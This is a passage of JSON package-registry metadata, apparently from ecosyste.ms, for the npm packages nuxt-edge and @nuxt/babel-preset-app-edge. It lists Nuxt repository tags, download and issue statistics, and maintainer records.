b46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-01-07T01:42:52.042Z","dependent_packages_count":489,"downloads":14933,"downloads_period":"last-month","dependent_repos_count":606,"rankings":{"downloads":1.0183080468782109,"dependent_repos_count":0.7422831522676323,"dependent_packages_count":0.11656472403624976,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":0.7012770636899687},"purl":"pkg:npm/nuxt-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-01-06T14:32:59.135Z","issues_count":3212,"pull_requests_count":1479,"avg_time_to_close_issue":7061527.056154537,"avg_time_to_close_pull_request":492358.088282504,"issues_closed_count":2212,"pull_requests_closed_count":1246,"pull_request_authors_count":240,"issue_authors_count":1526,"avg_comments_per_issue":5.2014321295143215,"avg_comments_per_pull_request":2.2014874915483436,"merged_pull_requests_count":1112,"bot_issues_count":1,"bot_pull_requests_count":437,"past_year_issues_count":2659,"past_year_pull_requests_count":1445,"past_year_avg_time_to_close_issue":2208643.5796213807,"past_year_avg_time_to_close_pull_request":412261.7828200972,"past_year_issues_closed_count":1784,"past_year_pull_requests_closed_count":1234,"past_year_pull_request_authors_count":224,"past_year_issue_authors_count":1272,"past_year_avg_comments_per_issue":3.816848439262881,"past_year_avg_comments_per_pull_request":2.1612456747404845,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":437,"past_year_merged_pull_requests_count":1106,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues"},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-edge/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2022-11-10T11:43:44.631Z","updated_at":"2022-11-10T11:43:44.631Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-10T11:43:44.621Z","updated_at":"2022-11-10T11:43:44.621Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-10T11:43:44.612Z","updated_at":"2022-11-10T11:43:44.612Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2024-06-06T19:15:21.130Z","updated_at":"2024-06-06T19:15:21.130Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2022-11-10T11:43:44.626Z","updated_at":"2022-11-10T11:43:44.626Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2024-06-08T01:50:44.442Z","updated_at":"2024-06-08T01:50:44.442Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096071,"name":"@nuxt/babel-preset-app-edge","ecosystem":"npm","description":"babel-preset-app for nuxt","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1812,"first_release_published_at":"2018-10-26T20:54:50.089Z","latest_release_published_at":"2020-06-29T00:22:27.126Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-05-10T20:01:39.399Z","created_at":"2022-04-08T10:39:20.815Z","updated_at":"2026-05-10T20:01:39.399Z","registry_url":"https://www.npmjs.com/package/@nuxt/babel-preset-app-edge","install_command":"npm install @nuxt/babel-preset-app-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://gith